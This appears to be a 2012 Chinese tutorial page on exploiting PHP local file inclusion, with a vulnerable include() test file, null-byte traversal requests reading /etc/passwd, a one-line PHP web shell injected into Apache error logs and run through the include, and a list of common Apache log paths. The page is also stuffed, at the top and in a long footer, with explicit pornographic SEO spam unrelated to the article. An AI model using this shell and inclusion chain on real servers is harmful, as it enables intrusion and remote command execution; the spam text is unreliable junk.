男人吃奶摸下挵进去好爽,日日躁夜夜躁狠狠躁,freesexvide0s性欧美高清,高清freexxxx性国产,无码人妻一区二区三区一,乱人伦中文字幕成人网站在线,亚洲欧美综合一区二区三区 ,神马影院在线视频观看
知識學堂
  • ·聯系電話:+86.023-75585550
  • ·聯系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 網站建設知識
PHP本地文件包含(LFI)漏洞利用
更新時間:2012-02-19 | 發布人:本站 | 點擊率:328
這次學習的主要參考資料是:http://downloads.ackack.net/LocalFileInclusion.pdf
 
實驗代碼:
 
如果是在linux上,直接提交:test.php?for=/etc/passwd%00即可顯示該文件。
 
<?php
  include($_GET['for'].‘.php’);//用于測試本地包含漏洞
 ?>
 
 
 
如果是在win上,提交:test.php?for=D:\tools\readme.txt%00,就可以了,跨目錄跨盤符。這里要注意,對于過多的”..\”,360會自動攔截,比較好的辦法是使用ie或者ff。
 
但是光是瀏覽文件是不夠的,我們還需要webshell。可以使用log injection的方法。這也是我作這個記錄的主要目的,這才是重點所在。
 
這里,思想的核心是要將php代碼注入到log中,比如,我們可以將:
 
<?php $s=$_GET;@chdir($s['x']);echo @system($s['y'])?>
 
注入進去(瀏覽器的自動更改實在太煩人)。注:friddle2不會對針對本機的訪問過濾,我就輸入本機的地址:192.168.0.1。
 
然后訪問:test.php?for=/var/log/apache/logs/error_log%00&x=/&y=uname,這是針對linux。如果平臺切換到win,可以訪問:test.php?for=..\apache\logs\error.log%00&x=.y=dir,會顯示當前目錄文件。
 
當然,我們也可以將日志記錄到access.log里,但那樣會更復雜一些,因為需要包含的文件會更大。
 
參考文獻還提到了:使用linux的/proc/self/fd進行注入的方法,我對linux不熟悉,所以也沒有細看,以后需要的時候再了解吧。
 
額外的發現:
 
360瀏覽器有個奇怪的特性,當訪問http://www.baidu.com/search/error.html%00../../../../../../tools后,會訪問一下目錄:D:\Program files\360se\tools 看看有沒有這個文件夾,這里有問題吧?TDH
 
D:\Program files\360se\360se3\http:\apache\logs\error.log%00&y=dir和http://192.168.0.1:88/test.php?for=..\..\..\apache\logs\error.log%00&y=dir,這兩者之間的關系是怎么得來的?
 
附錄:
 
1、可能的log路徑、
 
/etc/httpd/logs/access.log
 /etc/httpd/logs/access_log
 /etc/httpd/logs/error.log
 /etc/httpd/logs/error_log
 /opt/lampp/logs/access_log
 /opt/lampp/logs/error_log
 /usr/local/apache/log
 /usr/local/apache/logs
 /usr/local/apache/logs/access.log
 /usr/local/apache/logs/access_log
 /usr/local/apache/logs/error.log
 /usr/local/apache/logs/error_log
 /usr/local/etc/httpd/logs/access_log
 /usr/local/etc/httpd/logs/error_log
 /usr/local/www/logs/thttpd_log
 /var/apache/logs/access_log
 /var/apache/logs/error_log
 /var/log/apache/access.log
 /var/log/apache/error.log
 /var/log/apache-ssl/access.log
 /var/log/apache-ssl/error.log
 /var/log/httpd/access_log
 /var/log/httpd/error_log
 /var/log/httpsd/ssl.access_log
 /var/log/httpsd/ssl_log
 /var/log/thttpd_log
 /var/www/log/access_log
 /var/www/log/error_log
 /var/www/logs/access.log
 /var/www/logs/access_log
 /var/www/logs/error.log
 /var/www/logs/error_log
 C:\apache\logs\access.log
 C:\apache\logs\error.log
 C:\Program Files\Apache Group\Apache\logs\access.log
 C:\Program Files\Apache Group\Apache\logs\error.log
 C:\program files\wamp\apache2\logs
 C:\wamp\apache2\logs
 C:\wamp\logs
 C:\xampp\apache\logs\access.log
 C:\xampp\apache\logs\error.log
分享到: QQ空間 新浪微博 開心網 人人網
主站蜘蛛池模板: 两公的浮之手中字| 亚洲+欧美+视频| 亚洲伊人久久综合影院| 最近免费中文字幕mv视频7| 亚洲精品成人片在线播放| 久久久精品人妻无码专区不卡| 四房播色| 婷婷丁香社区| 国内精品久久久久国产盗摄| 亚洲av白丝在线播放| 给我免费观看片在线| 内射人妻骚骚骚| 国产免费视频| 777米奇色狠狠俺去啦奇米77| 鲁一鲁一鲁一鲁一曰综合网| a毛看片免费观看视频| 蜜桃成熟时1997| 日本欧美一区二区三区乱码| 在线欧美中文字幕农村电影| 久久午夜无码鲁丝片直播午夜精品| www.夜夜操.com| 精品久久久久久无码国产| 国产日产欧洲无码视频| 亚洲av麻豆aⅴ无码电影| 国产性色av高清在线观看| 精国产品一区二区三区a片| 国产精品免费高清在线观看| 成人欧美日韩一区二区三区| 福利视频在线播放| 永久黄网站色视频免费| 丝袜制服av熟女♀| 久久男人av资源站| 欧美老肥妇做爰bbww| 天堂网www资源在线| 吃瓜爆料就看黑料社区| 老司机午夜福利视频| 老司机午夜福利视频| 两个人在线观看高清视频| 亚洲欧美日韩国产成人精品影院| 人妻少妇精品中文字幕av蜜桃 | 浪漫樱花免费播放高清版在线观看 |